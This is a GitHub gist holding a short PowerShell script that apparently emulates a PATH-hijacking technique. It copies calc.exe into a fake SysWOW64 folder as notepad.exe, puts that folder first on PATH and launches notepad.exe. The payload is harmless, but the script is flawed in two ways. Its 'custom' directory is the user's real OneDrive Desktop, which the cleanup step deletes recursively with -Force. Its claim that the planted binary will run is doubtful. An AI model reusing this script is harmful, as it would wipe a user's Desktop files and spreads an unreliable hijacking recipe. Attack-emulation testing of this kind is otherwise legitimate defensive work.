Created
August 12, 2025 18:01
-
-
Save justaguywhocodes/db4bc41d84a9e2eb24b2fd06f06366f6 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Create a custom folder to mimic %windir% structure | |
| $customDir = "C:\Users\integ\OneDrive\Desktop" | |
| New-Item -Path $customDir -ItemType Directory -Force | |
| # Create a SysWOW64 folder inside the custom directory | |
| $syswow64Dir = "$customDir\SysWOW64" | |
| New-Item -Path $syswow64Dir -ItemType Directory -Force | |
| # Copy calc.exe to the custom SysWOW64 folder and rename it to notepad.exe (the targeted binary) | |
| Copy-Item -Path "C:\Windows\System32\calc.exe" -Destination "$syswow64Dir\notepad.exe" -Force | |
| # Modify the PATH environment variable to prioritize the custom folder | |
| $env:Path = "$customDir\SysWOW64;" + $env:Path | |
| # Attempt to run notepad.exe, which should now execute calc.exe from the custom folder | |
| Start-Process notepad.exe | |
| # Cleanup: Remove the custom folder from PATH and delete the custom directory | |
| $env:Path = ($env:Path -split ';' | Where-Object { $_ -ne $syswow64Dir }) -join ';' | |
| Remove-Item -Path $customDir -Recurse -Force |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment